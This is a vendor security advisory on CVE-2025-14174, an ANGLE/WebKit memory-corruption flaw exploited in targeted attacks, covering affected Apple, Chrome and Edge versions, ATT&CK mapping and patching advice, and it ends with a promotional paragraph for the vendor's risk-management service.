Executive Summary

Apple has released urgent security updates to address a critical WebKit vulnerability, CVE-2025-14174, which enables attackers to bypass the Same-Origin Policy (SOP) on iOS and macOS devices. This vulnerability affects all Apple devices capable of rendering web content, including Safari and all browsers on iOS/iPadOS, due to the mandatory use of WebKit as the rendering engine. The flaw is also present in Google Chrome and Microsoft Edge because of shared code in the ANGLE graphics library, indicating a cross-browser exploitation potential. The vulnerability has been confirmed as exploited in the wild in highly targeted attacks, underscoring the urgency for immediate patching and heightened vigilance.

Technical Information

CVE-2025-14174 is classified as an out-of-bounds write vulnerability (CWE-787) and improper restriction of operations within the bounds of a memory buffer (CWE-119). The vulnerability resides in ANGLE, an open-source graphics abstraction layer used by WebKit and Chromium-based browsers. When a user visits a specially crafted HTML page, a remote attacker can exploit this flaw to bypass browser isolation and the Same-Origin Policy, potentially leading to arbitrary code execution, data exfiltration, or further compromise of the device.

The vulnerability is remotely exploitable via web content, requiring user interaction (the victim must visit a malicious page). The impact is severe, affecting confidentiality, integrity, and availability. The CVSS v3.1 base score is 8.8 (High), reflecting the ease of exploitation and the potential for significant damage.

The technical root of the issue lies in how ANGLE handles certain memory operations. A crafted sequence of WebGL or graphics API calls can trigger an out-of-bounds write, corrupting memory and allowing the attacker to escape the browser sandbox. This can result in the execution of arbitrary code with the privileges of the browser process, which, on iOS and macOS, can be significant due to the integration of browser processes with the operating system.

The vulnerability is not limited to Safari or WebKit-based browsers. Because ANGLE is also used in Google Chrome and Microsoft Edge, the same flaw can be exploited across multiple browsers and platforms. Google patched the issue in Chrome on December 10, 2025, and Microsoft released corresponding updates for Edge. This cross-browser impact increases the attack surface and the urgency for organizations to ensure all endpoints are updated.

The attack chain typically involves a drive-by compromise, where a user is lured to a malicious website. Upon visiting the site, the exploit triggers the vulnerability, leading to memory corruption. If successful, the attacker can execute code outside the browser sandbox, potentially installing spyware, stealing credentials, or pivoting to other parts of the device or network.

Exploitation in the Wild

Exploitation of CVE-2025-14174 has been confirmed in the wild, as documented in the CISA Known Exploited Vulnerabilities (KEV) Catalog. The attacks observed are highly targeted and sophisticated, focusing on specific individuals running vulnerable versions of iOS prior to version 26. The victim profile suggests high-value targets, such as government officials, journalists, or members of civil society organizations.

The attack methodology involves sending phishing links or leveraging watering hole attacks, where legitimate websites are compromised to serve the exploit to selected visitors. Once the victim visits the malicious or compromised site, the exploit leverages the ANGLE vulnerability to achieve code execution. In some cases, this has led to the installation of surveillance software or the exfiltration of sensitive data.

No public indicators of compromise (IOCs) such as file hashes or command-and-control domains have been released as of this report. However, defenders should monitor for unusual outbound connections from browsers, unexpected process launches from Safari, Chrome, or Edge, and signs of browser sandbox escape or privilege escalation.

APT Groups using this vulnerability

As of this report, there is no public attribution of CVE-2025-14174 exploitation to a specific Advanced Persistent Threat (APT) group. The vulnerability was jointly discovered by Apple Security Engineering and Architecture and the Google Threat Analysis Group, both of which have a history of tracking nation-state actors and sophisticated cyber adversaries. The nature of the attacks—highly targeted, leveraging zero-day exploits, and focusing on high-value individuals—strongly suggests involvement by nation-state actors or advanced persistent threat groups.

The exploitation techniques align with several MITRE ATT&CK tactics and techniques, including T1189 (Drive-by Compromise), T1203 (Exploitation for Client Execution), and T1071 (Application Layer Protocol) for command-and-control communications post-exploitation. While no specific APT group has been named, organizations should assume that actors with significant resources and technical capabilities are leveraging this vulnerability in ongoing campaigns.

Affected Product Versions

The following product versions are affected by CVE-2025-14174: iOS/iPadOS versions 26.0 up to (excluding) 26.2 and up to (excluding) 18.7.3, macOS up to (excluding) 26.2, tvOS up to (excluding) 26.2, watchOS up to (excluding) 26.2, visionOS up to (excluding) 26.2, and Safari up to (excluding) 26.2. Additionally, Google Chrome and Microsoft Edge versions using the vulnerable ANGLE library prior to their respective December 2025 security updates are also impacted.

Organizations should conduct a comprehensive inventory of all endpoints, including mobile devices, desktops, and managed browsers, to identify and remediate any systems running affected versions.

Workaround and Mitigation

The primary mitigation for CVE-2025-14174 is to apply the latest security updates provided by Apple, Google, and Microsoft. All users and administrators should ensure that iOS, iPadOS, macOS, tvOS, watchOS, visionOS, Safari, Google Chrome, and Microsoft Edge are updated to the latest versions that include the patch for this vulnerability.

For organizations using Mobile Device Management (MDM) solutions, it is critical to enforce update policies that prevent users from deferring or blocking critical security updates. Administrators should monitor for anomalous browser or network activity, particularly on high-risk or high-value endpoints, as exploitation attempts may persist even after patches are released.

User awareness is also essential. Users should be informed about the risks of visiting unknown or suspicious websites, especially until all patches are applied across the organization. Where possible, restrict access to untrusted web content and implement network monitoring to detect signs of exploitation or data exfiltration.

No effective workaround exists other than patching, as the vulnerability is inherent to the browser rendering engine and graphics library. Disabling JavaScript or WebGL may reduce the attack surface but is not a practical solution for most users and organizations.

References

SOC Prime: CVE-2025-14174 Vulnerability Analysis, NVD: CVE-2025-14174, CISA KEV Catalog: CVE-2025-14174, Chrome Release Notes: Stable Channel Update for Desktop, Edge Security Release Notes: Microsoft Edge Security Updates, MITRE ATT&CK TTPs: MITRE ATT&CK, Apple Security Updates: Apple HT201222, Chromium Issue Tracker: 466192044.

Rescana is here for you

Rescana is committed to helping organizations navigate the evolving threat landscape. Our Third-Party Risk Management (TPRM) platform empowers security teams to continuously assess, monitor, and manage cyber risk across their digital ecosystem. We provide actionable intelligence, automated risk scoring, and deep visibility into your supply chain, enabling you to make informed decisions and respond rapidly to emerging threats. If you have any questions about this advisory or require further assistance, our experts are happy to help at ops@rescana.com.